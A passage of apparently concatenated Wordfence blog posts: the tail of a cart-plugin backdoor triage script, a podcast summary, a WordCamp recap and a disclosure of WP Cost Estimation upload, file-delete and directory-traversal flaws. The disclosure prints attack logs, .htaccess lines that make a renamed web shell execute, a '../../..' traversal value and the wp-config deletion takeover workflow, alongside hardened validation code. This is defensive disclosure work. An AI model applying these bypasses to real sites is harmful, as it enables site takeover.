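    return $files;
}

// --- Report ---
global $wpdb;
foreach ( act_cart_tables( $wpdb ) as $table ) {
    $rows = act_rows_with_markup( $wpdb, $table );
    echo "$table: " . count( $rows ) . " row(s) containing '<'\n";
    foreach ( $rows as $r ) {
        echo '  id=' . ( $r['id'] ?? '?' ) . ' first=' . ( $r['billing_first_name'] ?? '' )
           . ' last=' . ( $r['billing_last_name'] ?? '' ) . "\n";
    }
}

echo "\nAdministrator accounts:\n  " . implode( "\n  ", act_admin_accounts() ) . "\n";

$hits = act_backdoor_hits_in_inactive_plugins();
echo "\nSuspicious code in inactive plugins:\n  " . ( $hits ? implode( "\n  ", $hits ) : 'none found' ) . "\n";
```

Because the third check reads plugin source from disk rather than the database, it covers the secondary backdoor that the vendor's patch does not look for; a hit there, or an administrator you do not recognise, is the point at which to stop triage and start the incident response process the post describes.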

The good news for current Wordfence users is that these attacks are blocked by the XSS protection present in both the free and premium versions of our firewall. If you used one of these abandoned cart plugins and were not a Wordfence user prior to this patch, installing Wordfence and running a scan will tell you whether you have been hacked. Also consider reaching out to our team for a Site Security Audit, which includes a free year of Wordfence Premium in addition to the peace of mind provided by the audit itself.

Despite the release of a patch, these attacks are still ongoing and our investigation reveals new sites compromised daily. Please consider sharing this post as a public service announcement, to improve community awareness of these attacks and prompt updates for those who need them. As always, thank you for reading.

The post XSS Vulnerability in Abandoned Cart Plugin Leads To WordPress Site Takeovers appeared first on Wordfence.


Think Like a Hacker Podcast Episode 1: An Interview with Josepha Haden

Josepha Haden is the Executive Director of the WordPress project at Automattic. She oversees and directs all contributor teams in their work to build and maintain WordPress. Josepha can be found at https://josepha.blog. In our news segment, we talk about recent vulnerabilities in the Freemius library affecting WordPress plugins, the CoinHive shutdown, and why potential changes in WordPress core development will benefit end users’ security and more.

Click here to download an MP3 version of this podcast. Note that we are in the process of syndicating video and audio versions of this podcast to your favorite player, and we needed to publish our first episode to enable syndication. So check back in a few days and you should find us just about everywhere. Thanks for your patience.

This week in the news we cover:

  • WordPress, as of version 5.1, now alerts site owners on the dashboard if they’re using an out-of-date version of PHP.
  • The 2018 hacked site report from GoDaddy Security/Sucuri indicates increased prevalence of WordPress sites in their site cleaning business. In better news, they’re seeing more WordPress sites updated than in years past, and the WordPress sites are being updated much more frequently than eCommerce platforms.
  • Freemius, a library used by a number of plugins with large installation bases, recently experienced a vulnerability disclosure and a challenging experience with a security researcher. Their blog post is a heartening read about how we all can handle security vulnerability disclosures that serve customers and the community as a whole.
  • The widely used Chrome browser requires an update to patch a very serious vulnerability.
  • The WordPress core team is hoping to tighten major release cycles, which would streamline development for contributors as well as encourage more site owners to enable auto-updating.
  • A distributed cryptocurrency mining platform called CoinHive is ceasing operations. CoinHive was popular amongst hackers as a new way to mine cryptocurrency on hacked websites, but the crash in cryptocurrency value made it less profitable.

You can find me on Twitter as @mmaunder and Kathy as @kathyzant. Please don’t hesitate to post your feedback in the comments below.

The post Think Like a Hacker Podcast Episode 1: An Interview with Josepha Haden appeared first on Wordfence.


WordCamp Phoenix Recap

The first WordCamp for 2019 took place this past weekend in Phoenix, Arizona with nearly 700 attendees, and we were delighted to be involved. In addition to our gold-level sponsorship, Wordfence Threat Analyst Mikey Veenstra spoke on Friday, and our Client Partner Kathy Zant worked for months on the organizing committee to bring this highly successful camp together.

The WordCamp theme was the 10-year reunion, complete with Prom, Homecoming, and Sadie Hawkins level sponsorships, letterman jackets for the speakers, and some gorgeous PE-class t-shirts for attendees.

WordCamp Phoenix and our own Kathy Zant

The educational theme was a perfect parallel to the deep learning taking place in many of the sessions. With so many hosting, agency, and media companies based here, and a vibrant WordPress community over 2,500 members strong, the Phoenix WordCamp committee ensured that the program was on the cutting edge of WordPress development. Even with the deeply technical development track, a robust eCommerce track and a beginner’s workshop meant that there were sessions for everyone, no matter their skill level.

Going Deep with the Hacker Mindset

As with previous WordCamps, we brought hacker culture to the event to help WordPress users “think like a hacker” so they can better defend themselves from the relentless attacks from malicious actors. Using lock picking, our team taught hundreds of people how to get into the mindset of finding a way past a security control. Hackers are relentless in looking for vulnerabilities in WordPress sites. Site owners have to be relentless in their defensive posture in order to defend themselves.

2019 Wordfence lockpick set

For 2019, we rolled out a brand new “think like a hacker” lock pick set for anyone who could get into one of our basic training locks. We love the look in a beginner’s eyes when they pop a lock for the first time. For those who have never picked a lock or exploited a vulnerability in a website, the default belief is that everything is secure. We see a padlock on a gym locker, and we think of it as secure. Once someone has seen how security works, they are more adept at securing their own assets. And when we can think like a hacker, we can choose the right tools to secure your online assets, including your WordPress site.

On day two, we brought out the strongest locks. We had some contests to see who could get beyond the defenses of some of the strongest locks available. We had quite a few attendees do quite well, including one beginning lock picker that got into our strongest lock.

the monster lock

We have a number of team members who live in the Phoenix area, so we had a full team at the table. In addition, our Senior Operations Engineer Scott Bisker joined us from the snowy east coast for some fun in the desert.

The WCPHX Wordfence Team

Scott Bisker, Mikey Veenstra, Ram Gall, Nathan Smith

In the video below, Scott skillfully teaches a WordCamp attendee how to pick a lock. Watch and see how fast she gets the lock open.

As with all of the WordCamps we attend and sponsor, we made new friends, learned about their security concerns and gave advice on thwarting increasingly sophisticated attacks. We also shared new tools like Wordfence Central that can help site owners more quickly manage security alerts.

Building Friendships

Because so many Wordfence employees are based in the Phoenix area, along with world-class agencies, hosting providers, and security professionals, we had a little social reception the week immediately following WordCamp Phoenix at the Hotel Valley Ho in Scottsdale. Many of our new friends around the valley joined us for an excellent event.

We had hoped to have it on the Hotel Valley Ho rooftop, but apparently, when we plan a social event at the start of peak tourism season in Phoenix, we summon unprecedented winter storms from Mother Nature. The Superstition Mountains were snowcapped, a sight rarely seen in Phoenix.

While it was cold outside, inside we had great conversations, some amazing food including a make-your-own slider station, and we closed down the hotel bar afterward.

Mark Rudder, Kathy Zant, Mark Maunder, and Mikey Veenstra

Wordfence is uniquely situated as a premier leader of WordPress security with no allegiance to a large corporate entity. This independence gives us something not many other companies have, in that we have friends at many hosting providers, many security providers, and many WordPress agencies and users. We’re here to serve the interests of the greater community as a whole, and our independence allows us to do that.

It allows us to see an opportunity in the security space and bring that to WordPress. It allows us to see connections in the hosting space, and help end users make decisions in hosting that best serve each of their individual needs. It allows us to agnostically see where one WordPress user can benefit from an opportunity and help them make that connection.

Wordfence Social

Phoenix is an amazing city, and we’ll definitely be back to visit and be of service in making those connections again.

Where will we see you next?

We’re planning visits to a select number of WordCamps this year. Keep up with our travels on our new events page.

The post WordCamp Phoenix Recap appeared first on Wordfence.

Vulnerabilities Patched in WP Cost Estimation Plugin

At the end of January, Wordfence security analysts identified attackers exploiting vulnerabilities in outdated versions of the commercial plugin WP Cost Estimation & Payment Forms Builder, or WP Cost Estimation for short. These flaws were found and patched by the developer a few months ago, but no official public disclosure was made at the time. Following this discovery, our threat intelligence team reviewed updated versions of the plugin for additional security issues. We reported an unpatched directory traversal vulnerability to the developer, Loopus Plugins, who has since released an update addressing the issue. This flaw is present in plugin versions before 9.660.

Any sites using the plugin should update it to the latest available version. Wordfence WAF users, both free and paid, are already protected from each of these vulnerabilities thanks to broad rules built into the firewall. It is still recommended that Wordfence users perform these updates to ensure their sites are as secure as possible.

In today’s post, we’ll look at the original activity that drew our analysts’ attention to the plugin, then discuss the issues our team identified and disclosed to the developer.

File Upload and Delete Vulnerabilities Exploited In The Wild (Versions < 9.644)

During a forensic review of a compromised site, a Wordfence security analyst identified logs indicating the exploit used to take over the site:

POST /wp-admin/admin-ajax.php?action=lfb_upload_form
POST /wp-admin/admin-ajax.php?action=lfb_upload_form
POST /wp-content/uploads/CostEstimationPayment/_/ngfndfgsdcas.tss

The action lfb_upload_form was traced to the installed WP Cost Estimation plugin, which allowed us to piece together what had taken place. The installed version of the plugin was outdated, and the AJAX action allowing file uploads through form submissions was exploitable.

if (strlen($value["name"]) > 4 &&
$value['size'] < 10485760 &&
strpos(strtolower($value["name"]), '.php') === false &&
strpos(strtolower($value["name"]), '.js') === false &&
strpos(strtolower($value["name"]), '.html') === false &&
strpos(strtolower($value["name"]), '.phtml') === false &&
strpos(strtolower($value["name"]), '.pl') === false &&
strpos(strtolower($value["name"]), '.py') === false &&
strpos(strtolower($value["name"]), '.jsp') === false &&
strpos(strtolower($value["name"]), '.asp') === false &&
strpos(strtolower($value["name"]), '.htm') === false &&
strpos(strtolower($value["name"]), '.shtml') === false &&
strpos(strtolower($value["name"]), '.sh') === false &&
strpos(strtolower($value["name"]), '.cgi') === false
) {

The if statement above served as the only security check on uploaded files in older versions (9.526 in this case), performing some basic filename checks in an attempt to prevent files with executable extensions from being uploaded. Generally speaking, blacklisting uploads based on their filename is not an effective means of implementing upload security, as there tend to be techniques to bypass such methods. One such bypass was used here.

In the log entries above, you may have noticed the lfb_upload_form action being fired twice. This attack involved first uploading a web shell script with a meaningless extension, “ngfndfgsdcas.tss”. While the script was a malicious PHP file, the filename did not contain the string “.php”, and bypassed the blacklist. Then, to allow the uploaded file to execute as a PHP script, the following .htaccess file was uploaded:

AddHandler application/x-httpd-php .tss
AddType application/x-httpd-php .tss

These .htaccess rules associated the “.tss” extension with the PHP handler, allowing the shell to run as a PHP script. As of version 9.644 of WP Cost Estimation, released in October 2018, it is no longer possible to upload a valid .htaccess file to perform this bypass.

Interestingly, despite the attackers’ successful uploads, they quickly followed up with a different exploit against the same plugin. It’s unknown why this second exploit was performed, though it’s our assumption that either the uploaded shell or .htaccess file failed to behave as intended, leaving the attackers to go to Plan B.

In this second attack we see a new AJAX action from WP Cost Estimation, followed by a familiar attack pattern:

POST /wp-admin/admin-ajax.php?action=lfb_removeFile
POST /wp-admin/setup-config.php?step=2
POST /wp-admin/install.php?step=2
GET /wp-login.php
POST /wp-login.php
GET /wp-admin/
GET /wp-admin/theme-install.php?upload
POST /wp-admin/update.php?action=upload-theme
GET /wp-content/themes/AdvanceImage5/config.php

The exploited AJAX action, lfb_removeFile, can be used to delete arbitrary files on a vulnerable site:

public function removeFile(){
$formSession = sanitize_text_field($_POST['formSession']);
$file = sanitize_text_field($_POST['file']);
$fileName = $formSession . '_' . $file;
if(file_exists($this->uploads_dir .$fileName)){
unlink($this->uploads_dir .$fileName);
}
die();
}

The workflow for exploiting an arbitrary file delete flaw is usually the same: Delete the vulnerable site’s wp-config.php file. With no database configuration, WordPress assumes a fresh install is taking place. The attacker is then free to connect the site to their own remote database, log in as an administrator, and upload backdoors through the dashboard.

The lfb_removeFile AJAX action, along with the associated internal removeFile function shown above, was removed when the developer became aware of exploits and released version 9.644.

New Vulnerability – Upload Directory Traversal

Following the discovery of the earlier patched vulnerabilities, we spent some time reviewing the patches themselves to ensure they were sufficient. In the version we tested, the uploader had been improved in a few ways:

  • The blacklist of disallowed strings in filenames was expanded to block .htaccess uploads.
  • An admin-controlled whitelist of allowed filetypes was added, by default only allowing PNG, JPG, GIF, RAR, and ZIP files.
  • Forms could now have an internal randomSeed value, a short alphanumeric string appended to the user-input upload path in order to prevent existing directories from being accessed.

However, our investigation revealed a bypass case, allowing attackers to overwrite any file with a whitelisted type on an affected site.

$ext = $this->get_extension($value["name"]);
$allowedFiles = explode(",", $item->allowedFiles);
if (in_array('.' . strtolower($ext), $allowedFiles)) {
if (!is_dir($this->uploads_dir . $formSession . $form->randomSeed)) {
mkdir($this->uploads_dir . $formSession . $form->randomSeed);
chmod($this->uploads_dir . $formSession . $form->randomSeed, $this->chmodWrite);
}
move_uploaded_file($value["tmp_name"], $this->uploads_dir . $formSession . $form->randomSeed . '/' . $fileName);
chmod($this->uploads_dir . $formSession . $form->randomSeed . '/' . $fileName, 0644);
}

The code block above, taken from the patched version of the uploadFormFiles function, shows the $formSession and $form->randomSeed variables used in a number of places to define an upload path for a given file.

The intent of this behavior is for each visitor to a site to be given a unique $formSession value as a hidden field in each form, so files they upload can be grouped appropriately in directories. However, this value is ultimately user-supplied when the form is submitted, and is susceptible to directory traversal attacks. For example, submitting a $formSession value like ../../.. would place the uploaded file in the document root of a site, rather than in wp-content/uploads/CostEstimationPayment as intended.

This vulnerability is mitigated in part by the addition of the randomSeed value, which would break most directory traversal attempts by appending a random alphanumeric string following the $formSession input. Uploads could still be made to unintended directories, but it would prevent existing files from being overwritten.

Unfortunately, only forms created in the patched version would have an associated randomSeed value stored in the database. Forms which existed prior to the patch, which would certainly be the case for the majority of users, had an empty randomSeed value. This empty value does nothing when appended to the $formSession path, which leaves these forms vulnerable.

Even with a whitelist only allowing images and archives to be uploaded, an attacker could cause serious trouble with an exploit. Any image on a site could be overwritten, allowing defacement campaigns to replace them en masse. If any backups are kept in an accessible location in a zip archive, an attacker could replace this backup with their own poisoned version, containing new users in the database or backdoors buried elsewhere in the file structure. When the backup is restored (perhaps following a mysterious case of overwritten images), these backdoors would be deployed.

Coordinated Disclosure

Once we became aware of the remaining issues, we contacted the developer to begin the process of patching them. We quickly received a response from Charly Biscay of Loopus Plugins. Vendor responses to vulnerability disclosures can be unpredictable, if a response comes at all, but Charly was happy to be notified and worked closely with us through the process of developing a patch.

For this patch, we made three recommendations which were all implemented:

  1. Reject any $formSession containing any non-alphanumeric characters.
  2. Generate new randomSeed values for forms where a value is not present.
  3. Implement .htaccess restrictions in upload directories, so scripts are inaccessible in the event that a successful upload takes place.
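The following is an added example, not the plugin's code or the patch Loopus Plugins shipped: it shows one way to implement the three recommendations above, together with a whitelist extension check in place of the blacklist from version 9.526 and a realpath containment check on the final upload directory. The wfx_ function names, the uploads directory and the sample inputs are assumptions constructed for this illustration.

```php
<?php
// Added example (not the plugin's own code). Hardened versions of the upload
// path and extension checks discussed in the post. Function names, the uploads
// directory and the sample inputs are assumptions made for this illustration.

// Recommendation 1: a form session token may contain only alphanumerics, so
// a value like "../../.." can never reach the path concatenation.
function wfx_validate_form_session(string $formSession): ?string {
    return preg_match('/^[A-Za-z0-9]{1,64}$/', $formSession) ? $formSession : null;
}

// Recommendation 2: forms created before the patch have an empty randomSeed;
// accept only a stored alphanumeric seed, otherwise generate a new one.
function wfx_ensure_random_seed(string $storedSeed): string {
    if (preg_match('/^[A-Za-z0-9]{8,}$/', $storedSeed)) {
        return $storedSeed;
    }
    return bin2hex(random_bytes(4)); // 8 hex characters, stored with the form
}

// Whitelist instead of the blacklist from 9.526: only the final extension is
// considered, compared case-insensitively, and names without one are rejected.
function wfx_is_allowed_extension(string $fileName, array $allowed): bool {
    $ext = strtolower(pathinfo($fileName, PATHINFO_EXTENSION));
    return $ext !== '' && in_array('.' . $ext, $allowed, true);
}

// Recommendation 3: deny access to script files inside the upload directory
// so that a file which slips through is never executed (Apache 2.4 syntax).
function wfx_write_upload_guard(string $dir): bool {
    $rules = "<FilesMatch \"\\.(?i:php|phtml|phar|pl|py|cgi|sh)$\">\n"
           . "  Require all denied\n"
           . "</FilesMatch>\n";
    return file_put_contents($dir . '/.htaccess', $rules, LOCK_EX) !== false;
}

// Builds the per-form directory the way the patched uploadFormFiles does, but
// only from validated parts, and confirms it still resolves inside $uploadsDir.
function wfx_resolve_upload_dir(string $uploadsDir, string $formSession, string $seed): ?string {
    $base    = realpath($uploadsDir);
    $session = wfx_validate_form_session($formSession);
    if ($base === false || $session === null) {
        return null;
    }
    $target = $base . DIRECTORY_SEPARATOR . $session . $seed;
    if (!is_dir($target) && !mkdir($target, 0755, true)) {
        return null;
    }
    $real = realpath($target);
    // Defence in depth: validated input cannot traverse, but verify anyway.
    if ($real === false || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    wfx_write_upload_guard($real);
    return $real;
}

// Demonstration with constructed inputs; run from the command line.
if (PHP_SAPI === 'cli') {
    $uploads = sys_get_temp_dir() . '/wfx_uploads_' . bin2hex(random_bytes(2));
    mkdir($uploads);
    $seed    = wfx_ensure_random_seed('');   // pre-patch form with an empty seed
    $allowed = ['.png', '.jpg', '.gif', '.rar', '.zip'];

    var_dump(wfx_resolve_upload_dir($uploads, '../../..', $seed)); // traversal attempt
    var_dump(wfx_resolve_upload_dir($uploads, 'abc123', $seed));   // well-formed session
    var_dump(wfx_is_allowed_extension('ngfndfgsdcas.tss', $allowed)); // extension from the logs
    var_dump(wfx_is_allowed_extension('.htaccess', $allowed));        // handler override
    var_dump(wfx_is_allowed_extension('photo.PNG', $allowed));        // whitelisted image
}
```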

The timeline of the discovery, disclosure, and patching of this flaw is as follows:

2019-01-26: Upload directory traversal vulnerability discovered. Vendor contacted through form on CodeCanyon profile.
2019-01-28: Received response from vendor. Continued correspondence via email. Informed vendor of specific issues in WP Cost Estimation plugin.
2019-01-31: Patched version of WP Cost Estimation plugin released on CodeCanyon.

Next Steps

As usual, updating to the latest version of WP Cost Estimation should be made a priority. If your site has been running a vulnerable version of the plugin and you believe your site may have been compromised, consider working with our team on a security audit.

Some good news: sites making use of the Wordfence Firewall are in the clear. Exploits against each vulnerability described in this post are blocked by broad rules which were already built into the WAF, so free users don’t even need to wait. Still, even for Wordfence users, we recommend performing all available plugin and theme updates to ensure the security of your site.

Conclusion

To recap, our team identified attacks against outdated versions of the WP Cost Estimation & Payment Forms Builder plugin for WordPress. After review, we identified additional flaws and reported these to the developer who quickly released a patch. We recommend all users of this plugin update to the latest version as soon as possible.

For any questions regarding our vulnerability disclosure process, please check out our official policy.

Credits: Initial attack data discovered by Security Analyst Nate Smith. Vulnerability assessment and vendor correspondence by Threat Analyst Mikey Veenstra. Thanks to Charly Biscay of Loopus Plugins for the cooperation and quick patch release.

The post Vulnerabilities Patched in WP Cost Estimation Plugin appeared first on Wordfence.
